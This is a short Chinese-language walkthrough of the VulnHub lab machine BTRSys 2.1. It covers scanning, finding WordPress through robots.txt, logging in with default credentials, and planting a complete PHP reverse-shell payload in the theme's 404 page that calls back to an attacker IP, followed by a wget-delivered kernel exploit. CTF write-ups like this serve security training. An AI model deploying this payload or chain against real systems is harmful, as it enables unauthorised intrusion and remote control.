BTRSys 2.1
https://www.vulnhub.com/entry/btrsys-v21,196/
1.确定目标ip
2.端口和服务探测
根据vsftp版本没有找到相关漏洞利用代码
然后我们转战web
查看页面代码,前端源代码中也没有什么有意义的东西
nikto -h 192.168.88.199 发现在robots.txt 文件中 存在 wordpress目录
http://192.168.88.199/robots.txt
http://192.168.88.199/wordpress/
http://192.168.88.199/wordpress/wp-login.php
找到后台管理界面直接默认账号admin、admin登录成功!
看了一下也没有安装什么插件,但是我们可以编辑页面,可以写个反弹shell进去,为了避免影响正常页面显示,我们可以将404页面内容替换为反弹shell内容。
<?php /**/ error_reporting(0); $ip = ‘192.168.88.174’; $port = 4444; if (($f = ‘stream_socket_client’) && is_callable($f)) { $s = $f(“tcp://{$ip}:{$port}”); $s_type = ‘stream’; } if (!$s && ($f = ‘fsockopen’) && is_callable($f)) { $s = $f($ip, $port); $s_type = ‘stream’; } if (!$s && ($f = ‘socket_create’) && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = ‘socket’; } if (!$s_type) { die(‘no socket funcs’); } if (!$s) { die(‘no socket’); } switch ($s_type) { case ‘stream’: $len = fread($s, 4); break; case ‘socket’: $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack(“Nlen”, $len); $len = $a[‘len’]; $b = ”; while (strlen($b) < $len) { switch ($s_type) { case ‘stream’: $b .= fread($s, $len-strlen($b)); break; case ‘socket’: $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS[‘msgsock’] = $s; $GLOBALS[‘msgsock_type’] = $s_type; if (extension_loaded(‘suhosin’) && ini_get(‘suhosin.executor.disable_eval’)) { $suhosin_bypass=create_function(”, $b); $suhosin_bypass(); } else { eval($b); } die();
服务端开启侦听
百度查看一下wordpress 的目录结构
需要关注这里,方便我们确认404页面的路径
192.168.88.199/wordpress/wp-content/themes/twentyfourteen/404.php
搜索内核相关漏洞利用代码
编译脚本并开启web服务
通过wget将编译好的漏洞利用程序下载到目标机器
修改权限为777并执行exploit,成功获得root权限。
1669
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
